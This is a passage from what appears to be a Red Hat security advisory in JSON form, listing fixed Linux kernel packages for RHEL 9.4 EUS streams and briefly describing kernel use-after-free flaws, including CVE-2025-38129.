"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"RT-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel: RDMA/rxe use-after-free vulnerability leading to potential arbitrary code execution"
},
{
"cve": "CVE-2025-38129",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2025-07-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2376034"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel. This vulnerability, known as a use-after-free (UAF), occurs in the `page_pool_recycle_in_ring` function. A local attacker could exploit this by manipulating the system\u0027s memory management, causing a freed memory region to be improperly accessed. This can lead to system instability, unauthorized access to sensitive information, or potentially allow an attacker to execute malicious code.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel: Use-after-free vulnerability in page_pool_recycle_in_ring can lead to arbitrary code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Moderate impact. A use-after-free vulnerability in the Linux kernel\u0027s `page_pool_recycle_in_ring` function allows a local attacker to cause a denial-of-service or a kernel information leak problem. This flaw affects Red Hat Enterprise Linux 8, 9, and 10, as well as Red Hat In-Vehicle OS 1. Red Hat Enterprise Linux 6 and 7 are not affected as the vulnerable code is not present.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
